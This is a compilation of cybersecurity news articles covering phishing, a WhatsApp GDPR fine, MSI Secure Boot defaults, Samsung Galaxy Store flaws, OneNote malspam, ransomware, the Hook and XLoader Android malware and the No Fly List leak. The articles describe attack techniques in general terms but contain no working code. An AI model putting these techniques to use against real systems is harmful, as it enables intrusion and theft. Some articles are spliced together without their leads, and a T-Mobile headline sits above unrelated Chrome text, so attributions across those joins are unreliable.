According to security awareness and phishing training provider KnowBe4, some of the most common subject lines used in phishing emails during the last year are related to IT software updates, messages from HR about performance and messages which claim your boss has sent you a link to join to a meeting.

Many of us are used to seeing and clicking on emails like this every single day, as they're part of how we do our jobs – if you get an email that says it's from your boss about an unexpected meeting, that's likely to send you into a panic so you'll click through.

Then with messages which claim to be about software updates and security patches, the user is just trying to do the right thing – ironically in this case, by doing what was asked and thinking they're helping to protect their computer from cyber-attacks, they're accidentally encouraging one instead.

But while it's very possible to provide staff with phishing training, it needs to be effective – one multiple choice quiz a year isn't going to cut it.

But neither will 'gotcha' style phishing tests, where fake phishing emails appear to be designed to be indistinguishable from real emails the victim will be sent every day. 

It's unlikely that phishing attacks will ever be outright stopped – at least soon – but there are steps which organizations and individuals can take to help ensure they're as protected against them as possible.

For starters, if you're uncertain about something, don't immediately click on it – if the email claims to be from a colleague, use a channel that isn't email to ask them if they sent it.  If it's an email demanding urgent action needs to be taken because of an issue with your account, don't click the link in the email, but instead login to the account via the official URL – if something is wrong, it will tell you there.

In addition to this, using multi-factor authentication (MFA) can go a long way to prevent usernames and passwords of both corporate and personal accounts being stolen – although it isn't completely infallible against determined attackers.

Phishing attacks prey on human nature, they prey on our hopes and our fears, which is why they work. And until we find a replacement for email itself, they're unlikely to go away.

Source

The authority has ordered WhatsApp to bring its data processing operations into compliance within six months, or it faces a new fine.

On May 25, 2018, the DPC initiated an inquiry into a potential violation of the regulation by WhatsApp following a complaint from a German data subject.

On that same day, WhatsApp updated its Terms of Service and prompted all EU-based users to accept the changes by clicking to keep accessing the app's main interface.

Ignored user consent

The complaint submitted to DPC contended that WhatsApp forced users to accept the changes by making it a condition to continue using the software. Hence, users had to consent to the processing of their personal data just to open the app.

This violates Article 7 recital 32 of the GDPR, which requires that user consent must be given freely, and on a specific, informed, and unambiguous basis, without pressure, influence, or elements that introduce imbalance in the data subject's decision.

Following a comprehensive investigation, the DPC concluded the following:

1. WhatsApp Ireland did not clearly outline the legal basis or the explicit reasons for the requested user data processing, which violates Articles 12 and 13 of the GDPR.
2. WhatsApp Ireland has not violated Article 7 due to forced consent because the service did not rely on user consent for delivering its service or using it as a lawful basis for processing personal user data.

The first point will not incur additional penalties because the DPC has already served hefty fines to WhatsApp for the same reasons.

"The DPC, having already imposed a very substantial fine of €225 million on WhatsApp Ireland for breaches of this and other transparency obligations over the same period of time, did not propose the imposition of any further fine or corrective measures, having done so already in a previous inquiry," reads the rationale of the decision.

As for the second point, DPC's rejection of the German data subject's allegations doesn't end the case, as the German Supervisory Authority will now also review the complaint.

The fine of €5.5 million on WhatsApp Ireland is imposed due to a violation of Article 6 of the GDPR on "lawfulness of processing," which requires transparency, lawfulness, and fairness in data protection processes.

Additionally, the DPC will launch a new investigation covering all of WhatsApp's processing operations in its service to determine if there are violations of Article 9 of the GDPR on "processing of special categories of personal data."

The data protection agency wants to determine whether WhatsApp collects and processes sensitive data for behavioral advertising and marketing purposes and whether this data is also shared with any third parties.

WhatsApp informed BleepingComputer it is planning to appeal the decision, as it believes its service is operating in a legally compliant manner. Below is the full comment received from a WhatsApp spokesperson regarding DPC's decision:

WhatsApp has led the industry in private messaging by providing end-to-end encryption and layers of privacy that protect people. We strongly believe that the way the service operates is both technically and legally compliant. 

We rely upon the contractual necessity for service improvement and security purposes because we believe helping keep people safe and offering an innovative product is a fundamental responsibility in operating our service. We disagree with the decision and we intend to appeal.

Source

Findings from Atlas VPN based on data from threat intelligence platform AV-ATLAS, claims that in 2022 there were 1.9 million new Linux malware threats, bringing the figure up 50% year-on-year.

Most of the new Linux malware samples were discovered in the first three months of the year, the report further claims.

Secure operating system

In Q1 2022, researchers discovered 854,690 new strains. In Q2, the number dropped by 3%, with 833,065 new strains detected.

Malware developers for Linux must have taken a sabbatical in the third quarter of the year, as the number of new detections plummeted 91%, to 75,841. In the fourth quarter of the year, the figures picked up once again, growing by 117% to 164,697.

Despite these findings, Linux is still a “highly secure operating system”, the researchers say.

“The open-source nature of Linux allows for constant review by the tech community, leading to fewer exploitable security vulnerabilities.

Additionally, Linux limits administrative privileges for users and compared to more widely used operating systems like Windows, it still has less malware targeting it.”

But crooks will not stop hunting for vulnerabilities in the world’s fifth most popular operating system, and businesses and consumers alike should always be on the lookout, the researchers concluded.

Linux might not be as popular as Windows, or macOS, but it’s a widely used operating system. From Android devices (which are built on Linux), to Chromebooks, video cameras, wearable devices, to all kinds of servers (web servers, database servers, email servers, etc.) there are more than 32 million endpoints running on Linux.

Source

Secure Boot is an industry standard for ensuring that Windows devices don’t load malicious firmware or software during the startup process. If you have it turned on—as you should in most cases, and it's the default setting mandated by Microsoft—good for you. If you’re using one of more than 300 motherboard models made by manufacturer MSI in the past 18 months, however, you may not be protected.

Introduced in 2011, Secure Boot establishes a chain of trust between the hardware and software or firmware that boots up a device. Prior to Secure Boot, devices used software known as the BIOS, which was installed on a small chip, to instruct them how to boot up and recognize and start hard drives, CPUs, memory, and other hardware. Once finished, this mechanism loaded the bootloader, which activates tasks and processes for loading Windows.

The problem was: The BIOS would load any bootloader that was located in the proper directory. That permissiveness allowed hackers who had brief access to a device to install rogue bootloaders that, in turn, would run malicious firmware or Windows images.

When Secure Boot falls apart

About a decade ago, the BIOS was replaced with the UEFI (Unified Extensible Firmware Interface), an OS in its own right that could prevent the loading of system drivers or bootloaders that weren’t digitally signed by their trusted manufacturers.

UEFI relies on databases of both trusted and revoked signatures that OEMs load into the non-volatile memory of motherboards at the time of manufacture. The signatures list the signers and cryptographic hashes of every authorized bootloader or UEFI-controlled application, a measure that establishes the chain of trust. This chain ensures the device boots securely using only code that’s known and trusted. If unknown code is scheduled to be loaded, Secure Boot shuts down the startup process.

A researcher and student recently discovered that more than 300 motherboard models from Taiwan-based MSI, by default, aren’t implementing Secure Boot and are allowing any bootloader to run. The models work with various hardware and firmware, including many from Intel and AMD (the full list is here). The shortcoming was introduced sometime in the third quarter of 2021. The researcher accidentally uncovered the problem when attempting to digitally sign various components of his system.

“On 2022-12-11, I decided to setup Secure Boot on my new desktop with a help of sbctl,” Dawid Potocki, a Poland-born researcher who now lives in New Zealand, wrote. “Unfortunately I have found that my firmware was… accepting every OS image I gave it, no matter if it was trusted or not. It wasn't the first time that I have been self-signing Secure Boot, I wasn't doing it wrong.”

Potocki said he found no indication motherboards from manufacturers ASRock, Asus, Biostar, EVGA, Gigabyte, and NZXT suffer the same shortcoming.

The researcher went on to report that the broken Secure Boot was the result of MSI inexplicably changing its default settings. Users who want to implement Secure Boot— which really should be everyone—must access the settings on their affected motherboard. To do that, hold down the Del button on the keyboard while the device is booting up. From there, select the menu that says Security\Secure Boot or something to that effect and then select the Image Execution Policy submenu. If your motherboard is affected, Removable Media and Fixed Media will be set to "Always Execute."

To fix, change “Always Execute” for these two categories to “Deny Execute.”

In a Reddit post published on Thursday, an MSI representative confirmed Potocki’s findings. The representative wrote:

We preemptively set Secure Boot as Enabled and "Always Execute" as the default setting to offer a user-friendly environment that allows multiple end-users flexibility to build their PC systems with thousands (or more) of components that included their built-in option ROM, including OS images, resulting in higher compatibility configurations. For users who are highly concerned about security, they can still set “Image Execution Policy” as "Deny Execute" or other options manually to meet their security needs.

The post said that MSI will release new firmware versions that will change the default settings to “Deny Execute.” The above-linked subreddit contains a discussion that may help users troubleshoot any problems.

As mentioned, Secure Boot is designed to prevent attacks in which an untrusted person surreptitiously gets brief access to a device and tampers with its firmware and software. Such hacks are usually known as “Evil Maid attacks,” but a better description is “Stalker Ex-Boyfriend attacks.”

Source

The issues were discovered by researchers from the NCC Group between November 23 and December 3, 2022.

The Korean smartphone maker announced on January 1, 2023 that it fixed the two flaws and released a new version for Galaxy App Store (4.5.49.8).

Today, the NCC Group published technical details for the two security issues, along with proof-of-concept (PoC) exploit code for each of them.

It should be noted that both attacks require local access, an easy feat for motivated hackers and malware distributors targeting mobile devices.

Forcing app installs on Android

The first of the two flaws is tracked as CVE-2023-21433 and is an improper access control that allows attackers to install any applications available on the Galaxy App Store.

NCC discovered that the Galaxy App Store does not handle incoming intents in a safe way, allowing apps on the device to send arbitrary app installation requests.

The PoC shared by NCC’s analysts is an ‘ADB’ (Android Debug Bridge) command that instructs an app component to install the “Pokemon Go” game by sending an intent with the specified target application to the app store.

ADB command used in the PoC (NCC Group)

 

The intent may also specify if the new application should be opened or not after its installation, which gives threat actors more choices over how to conduct the attack.

The second vulnerability is CVE-2023-21434 is an improper input validation that lets attackers execute JavaScript on the target device.

NCC’s researchers found that webviews in the Galaxy App Store contain a filter that limits the domains it can be shown in it. However, that filter isn’t properly configured and can be bypassed to force the webview to access malicious domains.

The PoC presented in the report is a hyperlink that, if clicked from Chrome, will open a page containing malicious JavaScript and run it on the device.

Hyperlink to force the GS's webview to browse on unsafe sites (NCC Group)

 

NCC explains that the only prerequisite for this attack is for the malicious domain to have the “player.glb.samsung-gamelauncher.com” part in it. An attacker can register any domain and add that part as a subdomain.

Impact on Samsung users

Running arbitrary JavaScript code in webviews from within system-privilege apps like the Galaxy Store can come with severe security repercussions.

Depending on the attacker’s motives, the attack may lead to app UI interaction, access to sensitive information, or crashing apps.

The installation and automatic launch of apps from the Galaxy Store without the user’s knowledge may also lead to data or privacy breaches, especially if the attacker uploads a malicious app on the Galaxy Store beforehand.

It is important to note that CVE-2023-21433 is not exploitable on Samsung devices running Android 13, even if they use an older and vulnerable version of the Galaxy Store. This is owed to additional security protections on the latest version of Google’s mobile OS.

Unfortunately, all Samsung devices that are no longer supported by the vendor and which remain stuck to an older Galaxy Store version are vulnerable to the two vulnerabilities discovered by the NCC Group researchers.

Source

The operation's name was derived from the VAST ad-serving template and the "fast flux" evasion technique used to conceal malicious code by rapidly changing a large number of IP addresses and DNS records associated with a single domain.

According to HUMAN's report, Vastflux generated over 12 billion bid requests per day at its peak and impacted almost 11 million devices, many in Apple's iOS ecosystem.

Vastflux details

The research team at HUMAN (Satori) discovered Vastflux while investigating a separate ad fraud scheme. They noticed noticed that an app was generating an unusually large number of requests using different app IDs.

By reverse engineering the obfuscated JavaScript that operated in the app, the Satori team discovered the command and control (C2) server IP address it was communicating with and the ad-generating commands it sent.

Vastflux generated bids for displaying in-app ad banners. If it won, it placed a static banner image and injected obfuscated JavaScript into it.

The injected scripts contacted the C2 server to receive an encrypted configuration payload, which included instructions on the position, size, and type of ads to be displayed, as well as data for spoofing real app and publisher IDs.

Vastflux stacked up to 25 video ads on top of one another, all generating ad view revenue, but none of them was visible to the user as they were rendered behind the active window.

Rendering multiple invisible video ads (HUMAN)

 

To evade detection, Vastflux omitted the use of ad verification tags, which allows marketers to generate performance metrics. By avoiding these, the scheme was made invisible to most third-party ad-performance trackers.

Vastflux takedown

Having mapped the infrastructure for the Vasstflux operation, HUMAN launched three waves of targeted action between June and July 2022, involving customers, partners, and the spoofed brands, each delivering a blow to the fraudulent activity.

Eventually, Vastflux took its C2 servers offline for a while and scaled down its operations, and on December 6, 2022, the ad bids went down to zero for the first time.

Timeline of Vastflux's takedown (HUMAN)

 

While ad fraud does not have a malicious impact for the app users, it causes performance drops for the device, increases the use of battery and internet data, and can even lead to device overheating.

The above are common signs of adware infections or ad fraud in the device, and users should treat them with suspicion and try to pinpoint the app(s) that account for most of the resource consumption.

Video ads consume much more power than static ads, and multiple hidden video players aren't easy to hide from performance monitors, so it's crucial to always keep an eye on running processes and look for signs of trouble.

This comes after attackers have been distributing malware in emails using malicious Word and Excel attachments that launch macros to download and install malware for years.

However, in July, Microsoft finally disabled macros by default in Office documents, making this method unreliable for distributing malware.

Soon after, threat actors began utilizing new file formats, such as ISO images and password-protected ZIP files. These file formats soon became extremely common, aided by a Windows bug allowing ISOs to bypass security warnings and the popular 7-Zip archive utility not propagating mark-of-the-web flags to files extracted from ZIP archives.

However, both 7-Zip and Windows recently fixed these bugs causing Windows to display scary security warnings when a user attempts to open files in downloaded ISO and ZIP files.

Mark of the Web propagated to files inside an ISO
Source: BleepingComputer

 

Not to be deterred, threat actors quickly switched to using a new file format in their malicious spam (malspam) attachments: Microsoft OneNote attachments.

Abusing OneNote attachments

Microsoft OneNote is a desktop digital notebook application that can be downloaded for free and is included in Microsoft Office 2019 and Microsoft 365.

As Microsoft OneNote is installed by default in all Microsoft Office/365 installations, even if a Windows user does not use the application, it is still available to open the file format.

Since mid-December, cybersecurity researchers warned that threat actors had started distributing malicious spam emails containing OneNote attachments.

From samples found by BleepingComputer, these malspam emails pretend to be DHL shipping notifications, invoices, ACH remittance forms, mechanical drawings, and shipping documents.

Fake DHL email with a OneNote attachment
Source: BleepingComputer

 

Unlike Word and Excel, OneNote does not support macros, which is how threat actors previously launched scripts to install malware.

Instead, OneNote allows users to insert attachments into a NoteBook that, when double-clicked, will launch the attachment.

Threat actors are abusing this feature by attaching malicious VBS attachments that automatically launch the script when double-clicked to download malware from a remote site and install it.

However, the attachments look like a file's icon in OneNote, so the threat actors overlay a big 'Double click to view file' bar over the inserted VBS attachments to hide them.

Malicious OneNote email attachment
Source: BleepingComputer

 

When you move the Click to View Document bar out of the way, you can see that the malicious attachment includes multiple attachments. This row of attachments makes it so that if a user double-clicks anywhere on the bar, it will double-click on the attachment to launch it.

Hidden OneNote attachments
Source: BleepingComputer

 

Thankfully, when launching OneNote attachments, the program warns you that doing so can harm your computer and data.

But unfortunately, history has shown us that these types of prompts are commonly ignored, and users just click the OK button.

OneNote attachment security warning
Source: BleepingComputer

 

Clicking the OK button will launch the VBS script to download and install malware. As you can see from one of the malicious OneNote VBS files found by BleepingComputer, the script will download and execute two files from a remote server.

The first one shown below is a decoy OneNote document that opens and looks like the document you expected. However, the VBS file will also execute a malicious batch file in the background to install malware on the device.

Malicious VB script attached to a OneNote attachment
Source: BleepingComputer

 

In malspam emails seen by BleepingComputer, the OneNote files install remote access trojans that include information-stealing functionality.

Cybersecurity researcher James confirmed this, telling BleepingComputer that the OneNote attachments he analyzed installed the AsyncRAT and XWorm remote access trojans.

A OneNote attachment seen by BleepingComputer installs what is detected as the Quasar Remote Access trojan.

Protecting against these threats

Once installed, this type of malware allows threat actors to remotely access a victim’s device to steal files, saved browser passwords, take screenshots, and in some cases, even record video using webcams.

Threat actors also commonly use remote access trojans to steal cryptocurrency wallets from victims' devices, making this a costly infection.

The best way to protect yourself from malicious attachments is to simply not open files from people you do not know. However, if you mistakenly open a file, do not disregard warnings displayed by the operating system or application.

If you see a warning that opening an attachment or link could harm your computer or files, simply do not press OK and close the application.

If you feel it may be a legitimate email, share it with a security or Windows admin to help you verify if the file is safe.

Source

The most fascinating report this week comes from Jon DiMaggio who spent months going undercover to learn more about the LockBit's ransomware operation and its public representative known as LockBitSupp.

For those who want to learn more about the rise of the most prominent ransomware operation at this time, you should definitely give DiMaggio's Unlocking LockBit - a Ransomware Story a read.

The US and France also conducted a law enforcement operation where they seized the domain and arrested the operator of the Bizlato crypto exchange for allegedly money laundering crypto proceeds generated from ransomware and illegal drug transaction.

We also learned more about ransomware attacks conducted this week and in the past, including:

• Vice Society ransomware leaked the data for University of Duisburg-Essen (UDE).
• A a ransomware attack on shipping software supplier DNV impacted 1,000 ships.
• Data was stolen from the KFC, Taco Bell, and Pizza Hut brand owner during an attack
• LAUSD confirming SSNs were stolen in last year’s ransomware attack

However, it's not all bad news this week, with Avast releasing a free decryptor for the BianLian ransomware.

Furthermore, reports from both Chainalysis and Coveware illustrate that ransomware payments dropped approximately 40% in 2022 as companies refuse to pay and the enterprise invests in stronger security and better backups.

Contributors and those who provided new ransomware information and stories this week include: @LawrenceAbrams, @demonslay335, @malwrhunterteam, @Seifreed, @billtoulas, @PolarToffee, @struppigel, @serghei, @fwosar, @BleepinComputer, @Ionut_Ilascu, @chainalysis, @coveware, @BrettCallow, @jgreigj, @pcrisk, @Avast, and @Jon__DiMaggio.

January 16th 2023

Unlocking LockBit - A Ransomware Story

The LockBit ransomware gang is one of the most notorious organized cybercrime syndicates that exists today. The gang is behind attacks targeting private-sector corporations and other high-profile industries worldwide. News and media outlets have documented many LockBit attacks, while security vendors offer technical assessments explaining how each occurred. Although these provide insight into the attacks, I wanted to know more about the human side of the operation to learn about the insights, motivations, and behaviors of the individuals on the other side of the keyboard

Avast releases free BianLian ransomware decryptor

Security software company Avast has released a free decryptor for the BianLian ransomware strain to help victims of the malware recover locked files without paying the hackers.

Vice Society ransomware leaks University of Duisburg-Essen’s data

The Vice Society ransomware gang has claimed responsibility for a November 2022 cyberattack on the University of Duisburg-Essen (UDE) that forced the university to reconstruct its IT infrastructure, a process that's still ongoing.

New STOP Ransomware variants

PCrisk found new STOP ransomware variants that append the .poqw and .pouu extensions.

New VoidCrypt ransomware

PCRisk found a new VoidCrypt variant that appends the .gogo extension and drops a ransom note named unlock-info.txt.

January 17th 2023

Ransomware attack on maritime software impacts 1,000 ships

About 1,000 vessels have been affected by a ransomware attack against a major software supplier for ships.

New Phobos ransomware variant

PCRisk found a Phobos variant that appends the .STEEL extension and drops a ransom note named info.txt.

January 18th 2023

Bitzlato crypto exchange seized for ransomware, drugs money laundering

The U.S. Department of Justice arrested and charged Russian national Anatoly Legkodymov, the founder of the Hong Kong-registered cryptocurrency exchange Bitzlato, with helping cybercriminals allegedly launder illegally obtained money.

Ukraine links data-wiping attack on news agency to Russian hackers

The Computer Emergency Response Team of Ukraine (CERT-UA) has linked a destructive malware attack targeting the country's national news agency (Ukrinform) to Sandworm Russian military hackers.

New Xorist ransomware variant

PCRisk found a Xorist variant that appends the .BoY extension and drops a ransom note named HOW TO DECRYPT FILES.txt.

January 19th 2023

Ransomware profits drop 40% in 2022 as victims refuse to pay

Ransomware gangs extorted from victims about $456.8 million throughout 2022, a drop of roughly 40% from the record-breaking $765 million recorded in the previous two years.

Ransomware gang steals data from KFC, Taco Bell, and Pizza Hut brand owner

Yum! Brands, the fast food brand operator of KFC, Pizza Hut, Taco Bell, and The Habit Burger Grill fast-food restaurant chains, has been targeted by a ransomware attack that forced the closure of 300 locations in the United Kingdom.

Qulliq Energy Corporation impacted by a cybersecurity incident

Qulliq Energy Corporation (QEC) was targeted in an illegal cyberattack on January 15. QEC’s network was breached, and the corporation took immediate actions to contain the situation.

New STOP Ransomware variants

PCrisk found new STOP ransomware variants that append the .mzqw and .mzop extensions.

January 20th 2023

LAUSD says Vice Society ransomware gang stole contractors’ SSNs

Los Angeles Unified School District (LAUSD), the second-largest school district in the United States, says the Vice Society ransomware gang has stolen files containing contractors' personal information, including Social Security Numbers (SSNs).

Improved Security and Backups Result in Record Low Number of Ransomware Payments

Over the last 4 years, the propensity for victims of ransomware to pay a ransom has fallen dramatically, from 85% of victims in Q1 of 2019, to 37% of victims in Q4 of 2022. On an annual basis, 41% of victims paid in 2022 vs. 76% in 2019. Despite the best efforts of the cyber criminals rowing in the opposite direction, shaving 48 whole percentage points of this key indicator has been the result of several factors.

Costa Rica’s Ministry of Public Works and Transport crippled by ransomware attack

Costa Rica’s government has suffered another ransomware attack just months after several ministries were crippled in a wide-ranging attack by hackers using the Conti ransomware.

That's it for this week! Hope everyone has a nice weekend!

The Week in Ransomware - January 20th 2023 - Targeting Crypto Exchanges

The new malware is promoted by the creator of Ermac, an Android banking trojan selling for $5,000/month that helps threat actors steal credentials from over 467 banking and crypto apps via overlaid login pages.

While the author of Hook claims the new malware was written from scratch, and despite having several additional features compared to Ermac, researchers at ThreatFabric dispute these claims and report seeing extensive code overlaps between the two families.

ThreatFabric explains that Hook contains most of Ermac's code base, so it's still a banking trojan. At the same time, it includes several unnecessary parts found in the older strain that indicate it re-used code in bulk.

A more dangerous Android malware

Despite its origin, Hook is an evolution of Ermac, offering an extensive set of capabilities that make it a more dangerous threat to Android users.

One new feature of Hook compared to Ermac is the introduction of WebSocket communication that comes in addition to HTTP traffic used exclusively by Ermac. The network traffic is still encrypted using an AES-256-CBC hardcoded key.

The highlight addition, however, is the 'VNC' module that gives threat actors the capability to interact with the user interface of the compromised device in real-time.

Hook's author promoting the new VNC system (ThreatFabric)

 

This new system enables Hook's operators to perform any action on the device, from PII exfiltration to monetary transactions.

"With this feature, Hook joins the ranks of malware families that are able to perform full DTO, and complete a full fraud chain, from PII exfiltration to transaction, with all the intermediate steps, without the need of additional channels," warns ThreatFabric.

"This kind of operation is much harder to detect by fraud scoring engines, and is the main selling point for Android bankers."

The catch is that Hook's VNC requires Accessibility Service access to work, which might be hard to get on devices running Android 11 or later.

Hook's new (in addition to Ermac's) commands can perform the following actions:

• Start/stop RAT
• Perform a specific swipe gesture
• Take a screenshot
• Simulate click at specific text item
• Simulate a key press (HOME/BACK/RECENTS/LOCK/POWERDIALOG)
• Unlock the device
• Scroll up/down
• Simulate a long press event
• Simulate click at a specific coordinate
• Set clipboard value to a UI element with specific coordinates value
• Simulate click on a UI element with a specific text value
• Set a UI element value to a specific text

Apart from the above, a "File Manager" command turns the malware into a file manager, allowing the threat actors to get a list of all files stored in the device and download specific files of their choice.

Another notable command that ThreatFabric found concerns WhatsApp, allowing Hook to log all messages in the popular IM app and even allowing the operators to send messages via the victim's account.

Finally, a new geolocation tracking system enables Hook operators to track the victim's precise position by abusing the "Access Fine Location" permission.

Worldwide targeting

Hook's target banking applications impact users in the United States, Spain, Australia, Poland, Canada, Turkey, the UK, France, Italy, and Portugal.

Number of banking apps per country targeted by Hook (ThreatFabric)

 

However, it is essential to note that Hook's broad targeting scope covers the entire world. ThreatFabric listed all the apps Hook targets in the report's appendix for those interested.

At this time, Hook is distributed as a Google Chrome APK under the package names "com.lojibiwawajinu.guna," "com.damariwonomiwi.docebi," "com.damariwonomiwi.docebi," and "com.yecomevusaso.pisifo," but of course, this could change at any moment.

To avoid becoming infected with Android malware, you should only install apps from the Google Play Store or those provided by your employer.

Source

A copy of the U.S. No Fly List has leaked after being stored on an unsecure server connected to a commercial airline. The No Fly List is an official list maintained by the U.S. government of people it has banned from traveling in or out of the United States on commercial flights.

As first reported by The Daily Dot, a Swiss hacker known as maia arson crimew discovered the list on an unsecured Jenkins server one night while poking around on Shodan, a search engine that lets people look through servers connected to the internet.

“Like so many other of my hacks this story starts with me being bored and browsing shodan (or well, technically zoomeye, Chinese shodan), looking for exposed jenkins servers that may contain some interesting goods,” crimew said in a blog about the leak. “At this point I've probably clicked through about 20 boring exposed servers with very little of any interest, when I suddenly start seeing some familiar words. ‘ACARS,’ lots of mentions of ‘crew’ and so on. Lots of words I've heard before, most likely while binge watching Mentour Pilot YouTube videos. Jackpot. An exposed jenkins server belonging to CommuteAir.”

On the server was a large amount of company data about CommuteAir, including the private information about its employees. There was also a file containing a copy of a 2019 edition of the No Fly List. The list includes names and birth dates and more than 1.5 million entries, but many of those entries are aliases that all reference the same person.“It’s so much bigger than I thought it’d be,” crimew told Motherboard.

“TSA is aware of a potential cybersecurity incident, and we are investigating in coordination with our federal partners,” a spokesperson for the TSA told Motherboard.

The United States has maintained a No Fly List for decades, but its number was much smaller in the days before 9/11 and only contained 16 people. After the attacks and the creation of the Department of Homeland Security, the list rapidly expanded. The exact number of people on the list is unknown, and the leaked data is a few years old and contains multiple entries for a single individual, but recent estimates put the total number at somewhere between 47,000 and 81,000 people.

“It’s a perverse outgrowth of the U.S. police and surveillance state,” crimew said. “Just a list with no due process…mostly just based on them being related to someone or being from the same village as someone. It’s so massive. I feel like this has no place anywhere. I feel like this doesn’t solve the problem.”

crimew told Motherboard they weren’t shocked to stumble on an unsecured copy of the No Fly List. “I’ve been digging into various jenkins [servers] for a while and there’s just so much to find,” they said. “It was just a matter of time until I found something like this.”

CommuteAir said the leak happened because of a misconfigured development server. “The researcher accessed files including an outdated 2019 version of the federal no-fly list that included first and last name and date of birth,” it said. “Additionally, through information found on the server the researcher discovered access to a database containing personal identifiable information of CommuteAir employees.  Based on our initial investigation, no customer data was exposed. CommuteAir immediately took the affected server offline and started an investigation to determine the extent of data access. CommuteAir has reported the data exposure to the Cybersecurity and Infrastructure Security Agency, and also notified its employees.”

Source

T-Mobile announces another data breach, impacting 37 million accounts

Imperva Red issued a blog update on this note and essayed that hackers could induce a ‘Symlink-Symbolic Link’ into the directory that allows the OS to treat it as a file linked to a location in directory, which is not in reality.

Symlinks can lead to flaws when mis-handled and can allow the threat actors siphon data from browsers, an act not intended in actual.

With Chrome, the susceptibility arises when the browser interacts with the symlink to process files and directories without checking for the authenticity of the location of the Symbolic link in a file or directory.

How does this affect the users of Chrome, then?

Researchers state the hacker can create a fake website that is into the business of crypto wallet and urge users to creating a new wallet via download of recovery keys. These keys can contain zip files loaded with Symlinks connected to sensitive files or folders from the computer. This, when a user unzips the file, the upload of keys back to the website can allow a threat actor to gain access to sensitive files, leading to privacy concerns.

Google Chrome response

In response to the alert provided by Imperva Red, the web service provider issued an update that the flaw was addressed in the latest release of Chrome 108 and is thus urging its users to keep their software updated with security covers to all discovered vulnerabilities, such as those arising from Soft links( symlinks).

Source : https://www.cybersecurity-insiders.com/vulnerability-puts-data-of-2-5-billion-chrome-users-at-risk/

Starting in September 2022, researchers observed the 'Roaming Mantis' credential theft and malware distribution campaign using a new version of the Wroba.o/XLoader Android malware that detects vulnerable WiFi routers based on their model and changes their DNS.

The malware then creates an HTTP request to hijack a vulnerable WiFi router's DNS settings, causing connected devices to be rerouted to malicious web pages hosting phishing forms or dropping Android malware.

The updated Wroba.o/XLoader Android malware variant was discovered by Kaspersky researchers, who have been tracking Roaming Mantis activity for years. Kaspersky explains that Roaming Mantis has been using DNS hijacking since at least 2018,

but the new element in the latest campaign is that the malware targets specific routers.

The most current campaign using this updated malware targets specific WiFi router models used mainly in South Korea. Still, the hackers can change it anytime to include routers commonly used in other countries.

This approach allows the threat actors to perform more targeted attacks and compromise only specific users and regions while evading detection in all other cases.

Previous Roaming Mantis campaigns targeted users in Japan, Austria, France, Germany, Turkey, Malaysia, and India.

A new router DNS changer

The latest Roaming Mantis campaigns use SMS phishing texts (smishing) to direct targets to a malicious website.

If the user's mobile device is Android, it will prompt the user to install the malicious Android APK, which is the Wroba.o/XLoader malware. The landing page will instead redirect iOS users to a phishing page that attempts to steal credentials.

Latest campaign attack diagram (Kaspersky)

 

Once the XLoader malware is installed in the victim's Android device, it obtains the default gateway IP address from the connected WiFi router. Then it attempts to access the administrator web interface using a default password to discover the device model.

XLoader checking the WiFi router model (Kaspersky)

 

XLoader now features 113 hard-coded strings used to detect to specific WiFi router models, and if there's a match, the malware performs the DNS hijacking step by changing the router's settings.

The malware performs the DNS change on the router (Kaspersky)

 

Kaspersky says the DNS changer uses default credentials (admin/admin) to access the router and then performs changes in the DNS settings using different methods depending on the detected model.

The analysts also explain that the DNS server used by Roaming Mantis only resolves certain domain names to specific landing pages when accessed from a mobile device, which is likely a tactic to hide from security researchers.

Spreading the infection

With the router's DNS settings now changed, when other Android devices connect to the WiFi network, they will be redirected to the malicious landing page and prompted to install the malware.

This creates a continuous stream of infected devices to further breach clean WiFi routers in public networks that serve large numbers of people in the country.

Kaspersky warns that this possibility gives the Roaming Mantis campaign a “purposefully unchained” characteristic, letting the malware spread without tight control.

Although there are no landing pages for U.S.-based targets, and Roaming Mantis doesn’t appear to be actively targeting router models used in the country, Kaspersky’s telemetry shows that 10% of all XLoader victims are in the U.S.

Users can protect themselves from the Roaming Mantis campaigns by avoiding clicking on links received via SMS. However, even more importantly, avoid installing APKs outside Google Play.

According to data from blockchain analytics company Chainalysis, this drastic decline in ransomware profits is not driven by fewer attacks but the victims' refuse to pay the hackers.

Ransomware profits per year (Chainalysis)

 

2022 was one of the most active years in ransomware activity, with thousands of file-encrypting malware strains targeting organizations of all sizes.

However, likely due to diminishing profits, among other reasons, the average ransomware lifespan dropped from 153 days in 2021 to just 70 days in 2022.

Lifespan of ransomware families (Chainalysis)

 

The year was marked by the end of the Conti operation and the emergence of new ransomware-as-a-service activities like Royal, Play, and BlackBasta. Meanwhile, the operators of LockBit, Hive, Cuba, BlackCat, and Ragnar ransomware maintained a relatively steady flow of victims throughout 2022.

Ransomware gang activity per quarter (Chainalysis)

Victims won’t pay

Despite the multiple extortion tactics employed by ransomware operators - e.g. file encryption, DDoS attacks, threats to leak stolen data or to inform data protection authorities of a breach - a growing number of victims refuse to meet the threat actors’ demands.

Cyber-intelligence firm Coveware says there’s an identifiable trend since 2019 in its stats, showing that victim paying rates are constantly dropping.

In 2019, 76% of ransomware victims chose to pay the ransom while only 24% dealt with the consequences instead. This trend changed in 2022, as 59% of victims chose not to pay the ransom.

Ransomware payment percentage (Coveware)

 

The past year marked a significant psychological turning point for both attackers and defenders. 2022 was the first year when more ransomware victims decided not to pay. This shift in behavior highlights a change in the perception and approach toward handling ransomware attacks.

This change can be attributed mainly to three things:

1. The victims realize that paying the ransom does not guarantee they will get their files back and that the threat actors will delete the stolen files.
2. The public perception of ransomware attacks has matured, and data leaks resulting from these incidents tend to have an attenuated effect on brand reputation tarnishing.
3. Organizations are following better backup strategies which are also required for ransomware coverage insurers, often giving them a way to restore their IT infrastructure in cases of attack.

Even if victims are handling ransomware attacks differently than two years ago, completely discouraging the operators by not paying them is still a distant goal.

As long as the percentage of paying victims is significant or hackers cash in larger amounts from higher-value targets, ransomware attacks will be a present threat.

Source